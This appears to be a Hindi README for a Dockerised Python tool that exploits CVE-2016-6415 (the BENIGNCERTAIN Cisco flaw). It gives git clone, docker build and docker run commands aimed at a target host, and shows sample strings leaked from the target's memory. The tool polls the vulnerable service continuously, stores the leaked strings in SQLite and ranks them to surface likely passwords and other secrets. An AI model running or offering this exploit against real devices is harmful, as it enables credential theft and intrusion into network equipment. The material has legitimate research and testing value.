
VirtueSecurity के benigncertain-monitor का पुनः कार्यान्वयन
VirtueSecurity के benigncertain-monitor का पुनः कार्यान्वयन। इसमें मूल जैसे सभी पेलोड विकल्प नहीं हैं, लेकिन यह bc-id बाइनरी को रॉस ब्रैडली द्वारा बेहतर प्रूफ ऑफ कॉन्सेप्ट से बदल देता है जिसे आवश्यकतानुसार विस्तारित किया जा सकता है।
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
सेवा लगातार कमजोर सेवा को पोल करेगी, मेमोरी से ascii स्ट्रिंग्स निकालेगी, स्ट्रिंग्स को स्थानीय sqlite डेटाबेस में संग्रहीत करेगी, और सबसे अधिक बार देखे गए स्ट्रिंग्स दिखाएगी:
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
यह एक डॉकरीकृत पायथन स्क्रिप्ट है जो NSA BENIGNCERTAIN Cisco शोषण CVE-2016-6415 के प्रति संवेदनशील लक्ष्य की मेमोरी लगातार लीक करती है।
स्क्रिप्ट समय के साथ कमजोर सेवा को पोल करती है ताकि संभावित पासवर्ड और अन्य संभावित संवेदनशील जानकारी की पहचान कर सके। इसका उपयोग केवल एक प्रूफ ऑफ कॉन्सेप्ट शोषण के बजाय समय की अवधि में कार्रवाई योग्य डेटा एकत्र करने के लिए किया जा सकता है।